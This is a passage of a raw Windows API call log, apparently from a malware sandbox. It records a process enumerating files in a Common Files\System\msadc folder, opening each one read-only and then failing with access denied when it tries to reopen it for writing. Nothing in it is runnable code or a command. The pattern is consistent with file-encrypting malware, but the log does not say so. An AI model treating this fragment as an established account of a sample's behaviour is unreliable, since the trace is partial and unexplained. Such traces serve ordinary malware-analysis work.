lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.542] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.542] CloseHandle (hObject=0x368) returned 1 [0088.542] AreFileApisANSI () returned 1 [0088.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0088.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82058 [0088.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 66 [0088.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.543] GetLastError () returned 0x5 [0088.543] GetLastError () returned 0x5 [0088.543] SetLastError (dwErrCode=0x5) [0088.543] GetLastError () returned 0x5 [0088.543] SetLastError (dwErrCode=0x5) [0088.543] GetLastError () returned 0x5 [0088.543] SetLastError (dwErrCode=0x5) [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0088.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.543] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0088.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0088.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0088.544] AreFileApisANSI () returned 1 [0088.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", lpUsedDefaultChar=0x0) returned 66 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.544] AreFileApisANSI () returned 1 [0088.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0088.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82a78 [0088.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82a78, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 66 [0088.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.545] GetFileType (hFile=0x368) returned 0x1 [0088.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82a78 | out: hHeap=0x20000) returned 1 [0088.545] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.545] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.545] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.545] CloseHandle (hObject=0x368) returned 1 [0088.546] AreFileApisANSI () returned 1 [0088.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0088.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82dd8 [0088.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 66 [0088.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.546] GetLastError () returned 0x5 [0088.546] GetLastError () returned 0x5 [0088.546] SetLastError (dwErrCode=0x5) [0088.546] GetLastError () returned 0x5 [0088.546] SetLastError (dwErrCode=0x5) [0088.546] GetLastError () returned 0x5 [0088.546] SetLastError (dwErrCode=0x5) [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.546] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x82, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a538, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x82, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sa", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓᠀")) returned 0 [0088.546] FindClose (in: hFindFile=0x77f90 | out: hFindFile=0x77f90) returned 1 [0088.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0088.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0088.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0088.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.547] AreFileApisANSI () returned 1 [0088.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", lpUsedDefaultChar=0x0) returned 54 [0088.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.548] AreFileApisANSI () returned 1 [0088.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0088.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 54 [0088.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.549] GetFileType (hFile=0x348) returned 0x1 [0088.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.549] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.549] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.549] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.550] CloseHandle (hObject=0x348) returned 1 [0088.550] AreFileApisANSI () returned 1 [0088.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0088.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 54 [0088.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.550] GetLastError () returned 0x5 [0088.550] GetLastError () returned 0x5 [0088.550] SetLastError (dwErrCode=0x5) [0088.550] GetLastError () returned 0x5 [0088.550] SetLastError (dwErrCode=0x5) [0088.550] GetLastError () returned 0x5 [0088.550] SetLastError (dwErrCode=0x5) [0088.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0088.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.550] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41dce0ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41dce0ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41dce0ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadcer.dll", cAlternateFileName="")) returned 1 [0088.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0088.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0088.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.551] AreFileApisANSI () returned 1 [0088.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", lpUsedDefaultChar=0x0) returned 55 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0088.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.552] AreFileApisANSI () returned 1 [0088.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0088.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 55 [0088.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.553] GetFileType (hFile=0x348) returned 0x1 [0088.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, 